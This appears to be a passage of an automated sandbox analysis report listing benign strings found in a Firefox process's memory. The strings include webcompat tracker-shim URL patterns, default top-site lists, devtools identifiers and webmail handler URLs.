                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3385444273.00000214A7B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
                          Source: firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001D.00000003.3318498425.00000214ABF64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/https://www.wikipedia.org/devtools.jsonview.enabledSSF_updateSessionStoreForStorageconvertStorageTransactionType equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3455841422.0000250454D04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3442157921.00000214B3B78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3442157921.00000214B3B78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3442157921.00000214B3B78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: releaseDistinctSystemPrincipalLoaderresource://devtools/shared/security/socket.js@mozilla.org/dom/slow-script-debug;1devtools.debugger.remote-websocket{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}Got invalid request to save JSON datadevtools/client/framework/devtoolsFailed to listen. Listener already attached.^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?devtools.performance.popup.feature-flagFailed to execute WebChannel callback:WebChannel/this._originCheckCallback@mozilla.org/network/protocol;1?name=default@mozilla.org/network/protocol;1?name=filedevtools/client/framework/devtools-browserresource://devtools/server/devtools-server.jsUnable to start devtools server on Failed to listen. Callback argument missing.^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)devtools.performance.recording.ui-base-urlbrowser.fixup.domainsuffixwhitelist.get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUP^([a-z+.-]+:\/{0,3})*([^\/@]+@).+DevTools telemetry entry point failed: get FIXUP_FLAGS_MAKE_ALTERNATE_URI_finalizeInternal/this._finalizePromise<resource://gre/modules/JSONFile.sys.mjshttp://compose.mail.yahoo.co.jp/ym/Compose?To=%s@mozilla.org/network/file-input-stream;1resource://gre/modules/FileUtils.sys.mjshttps://poczta.interia.pl/mh/?mailto=%shttps://mail.inbox.lv/compose?to=%s@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/web-handler-app;1@mozilla.org/uriloader/dbus-handler-app;1Can't invoke URIFixup in the content processresource://gre/modules/NetUtil.sys.mjsextension/default-theme@mozilla.org/extendedData{33d75835-722f-42c0-89cc-44f328e56a86}isDownloadsImprovementsAlreadyMigratedgecko.handlerService.defaultHandlersVersionget FIXUP_FLAG_FORCE_ALTERNATE_URIextractScheme/fixupChangedProtocol<Scheme should be either http or httpshttp://www.inbox.lv/rfc2368/?value=%shandlerSvc fillHandlerInfo: don't know this typeresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/JSONFile.sys.mjsresource://gre/modules/ExtHandlerService.sys.mjsresource://gre/modules/URIFixup.sys.mjsresource://gre/modules/FileUtils.sys.mjs{c6cf88b7-452e-47eb-bdc9-86e3561648ef}_injectDefaultProtocolHandlersIfNeededhttps://mail.yahoo.co.jp/compose/?To=%shttp://poczta.interia.pl/mh/?mailto=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/network/async-stream-copier;1Must have a source and a callback@mozilla.org/network/simple-stream-listener;1newChannel requires a single object argumentSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLFirst argument should be an nsIInputStreamNon-zero amount of bytes must be specified@mozilla.org/intl/converter-input-stream;1@mozilla.org/scriptableinputstream;1https://mail.yandex.ru/compose?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/network/input-stream-pump;1https://mail.inbox.lv/compose?to=%shttps://poczta.interia.pl/mh/?mailto=%spdfjs.previousHandler.preferredActionpdfjs.previousHandler.alwaysAskBeforeHandling@mozilla.org/uriloader/handler-service;1https://mail.yahoo.co.jp/compose/?To=%sVALIDATE_DONT
                          Source: firefox.exe, 0000001D.00000003.3318498425.00000214ABF64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: updateSessionStoreForStorageDEFAULT_REPLACEMENT_CHARACTERget sendAttributionRequestdecodeImageFromArrayBuffermain/nimbus-desktop-experimentsmessage-manager-disconnecthttps://www.facebook.com/https://www.wikipedia.org/devtools.jsonview.enabledSSF_updateSessionStoreForStorage equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: updated-import-infrequent-rollout-make-yourself-at-home-copyUpdated Import Infrequent Rollout - Make Yourself At Home CopyExperimenting on onboarding content when you upgrade Firefox.firefox-desktop-search-release-no_targeting-rollout-1WEBEXT_BACKGROUND_PAGE_LOAD_MS_BY_ADDONIDdisabled_picture_in_picture_overrides.dailymotionTesting out the data and insights capture in the awesome bar.disabled_picture_in_picture_overrides.frontendMastersdisabled_picture_in_picture_overrides.frontendMastersfirefox-desktop-urlbar-nightly-no_targeting-rollout-2disabled_picture_in_picture_overrides.radiocanadadisabled_picture_in_picture_overrides.washingtonpostThis is a validation test, no changes are being appliedThis is a validation test, no changes are being appliedUPDATE moz_places SET alt_frecency = NULLfirefox-desktop-no-feature-firefox-desktop-release-1places.sqlite#1: PlacesExpiration.jsm: setup (1)WEBEXT_BACKGROUND_PAGE_LOAD_MS_BY_ADDONIDdisabled_picture_in_picture_overrides.yahoofinancedisabled_picture_in_picture_overrides.yahoofinancedisabled_picture_in_picture_overrides.dailymotiondisabled_picture_in_picture_overrides.radiocanadadisabled_picture_in_picture_overrides.washingtonpostTesting out the data and insights capture in the awesome bar.firefox-desktop-no-feature-firefox-desktop-release-1places.sqlite#1: PlacesUtils.metadata.get (0)This is a validation test, no changes are being appliedupdated-import-infrequent-rollout-make-yourself-at-home-copyfirefox-desktop-no-feature-firefox-desktop-release-1firefox-desktop-upgradeDialog-no_targeting-rollout-1firefox-desktop-search-nightly-no_targeting-rollout-1firefox-desktop-urlbar-release-no_targeting-rollout-2{"active":false,"fullscreen":true,"tabsintitlebar":false}*://static.adsafeprotected.com/vans-adapter-google-ima.js*://securepubads.g.doubleclick.net/tag/js/gpt.js**://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js**://id.rambler.ru/rambler-id-helper/auth_events.js{"active":false,"fullscreen":true,"tabsintitlebar":false}*://www.gstatic.com/firebasejs/*/firebase-messaging.js**://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*"*://webcompat-addon-testbed.herokuapp.com/shims_test.js""*://track.adform.net/serving/scripts/trackpoint/async/"*://media.richrelevance.com/rrserver/js/1.2/p13n.js"*://static.adsafeprotected.com/vans-adapter-google-ima.js""*://web-assets.toggl.com/app/assets/scripts/*.js""*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js""*://pagead2.googlesyndication.com/tag/js/gpt.js*"*://www.googleadservices.com/pagead/conversion_async.js"*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*""*://securepubads.g.doubleclick.net/tag/js/gpt.js*"*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*"*://track.adform.net/serving/scripts/trackpoint/""*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*"nav-bar{"active":false,"fullscreen":true,"tabsintitlebar":false}"*://www.googleadservices.com/pagead/conversion_async.js"{"active":false,"fullscreen":true,"tabsintitlebar":false}"*://id.
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: url('chrome://activity-stream/content/data/content/assets/mr-pintaskbar.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/h&@ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: url('chrome://activity-stream/content/data/content/assets/mr-pintaskbar.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/h&@ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: url('chrome://activity-stream/content/data/content/assets/mr-pintaskbar.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/h&@ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001D.00000002.3407434312.00000214ABE1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3407434312.00000214ABE8F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3407434312.00000214ABE17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId:
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", 